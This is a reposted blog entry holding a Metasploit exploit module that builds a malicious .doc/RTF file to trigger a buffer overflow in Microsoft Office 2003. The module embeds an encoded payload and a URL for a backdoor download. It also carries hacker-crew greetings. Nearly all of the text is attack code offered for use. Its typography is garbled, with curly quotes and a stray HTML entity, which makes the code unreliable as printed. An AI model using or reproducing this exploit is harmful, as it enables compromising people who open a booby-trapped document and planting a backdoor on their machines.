Bugs · 2012 年 2 月 26 日 0

Microsoft Office 2003(.doc)命令执行及本地溢出漏洞

###
# Title : Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) – Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns
# platform : windows ( local BOF via MSF)
# Type : local exploit / Buffer Overflow / Metasploit
###

##
# | >> ——–+++=[ Dz Offenders Cr3w ]=+++——– << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
# | ————————————————- < |
###

##
# $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $
##

require ”msf/core”

class Metasploit3 < Msf::Exploit::Remote
     Rank = GoodRanking

    include Msf::Exploit::FILEFORMAT

    def initialize(info = {})
        super(update_info(info,
           ”Name”     => ”Microsoft Office 2003 (.doc) Command Exec and local BOF”,
           ”Description” => %q{
             This module exploits a buffer overflow in Microsoft Office 2003
             and Command Exec With .doc file .
},
           ”License”        => MSF_LICENSE,
           ”Author”         =>
              [
               ”b33f”,
               ”g11tch”,
               ”KedAns-Dz <ked-h[at]hotmail.com>” # MSF module
              ],
           ”Version”        => ”1.0”,
           ”References”     =>
               [
            [ ”URL”, ”http://exploit-db/exploits/18334” ],
               ],
           ”DefaultOptions” =>
               {
                ”EXITFUNC” => ”process”,
               },
           ”Payload”        =>
                {
                ”Space”      => 1024,
                ”BadChars”    => "”",
                ”EncoderType”  => Msf::Encoder::Type::AlphanumMixed,
                ”EncoderOptions” =>
                   {
                    ”BufferRegister” => ”ESI”,
                   }
                },
           ”Platform”       => ”win”,
           ”Targets”        =>
               [
             [ ”Microsoft Office 2003 – MSWord (.doc Heap Spray)”, { ”Ret” => ”” } ],
               ],
            ”DisclosureDate” => ”JAN 08 2012”,
            ”DefaultTarget”  => 0))

        register_options(
           [
            OptString.new(”FILENAME”, [ true, ”The file name.”,  ”msf.doc”]),
            OptString.new(”URLBD”, [ true, ”URL From the Backdoor.”,  ”http://”]),
           ], self.class)
    end

    def exploit
        # Encode the url.
        url = Rex::Text.to_unescape(datastore[”URLBD”])
    # Header File
   file =
   "\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70"+
   "\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73"+
   "\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a"+
   "\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72"+
   "\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68"+
   "\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d"+
   "\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73"+
   "\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72"+
   "\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
   "\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
   "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52"+
   "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
   "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66"+
   "\x66\x66\x66\x66\x66\x66\x66\x66"
 # Buffer Overflow
   buf = "\x23" * 501
       buf << "\x30\x35"
   &nbsp
;   buf << "\x30" * 40
       buf << "\x36\x36\x34\x33\x33\x32\x33\x30" # CALL ESP – WINWORD.exe
       buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2
       buf << rand_text_alpha(42)
       buf << "\x39\x30" * 18
       buf << payload.encoded
      # Create the doc
        doc = file
        doc << buf
        doc << url
        doc << "\x00"
        doc << "{}}}}}}"
        doc << "\x0d\x0a"
        doc << "}"

print_status("Creating ”#{datastore[”FILENAME”]}” file…")

file_create(doc)
end

end

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================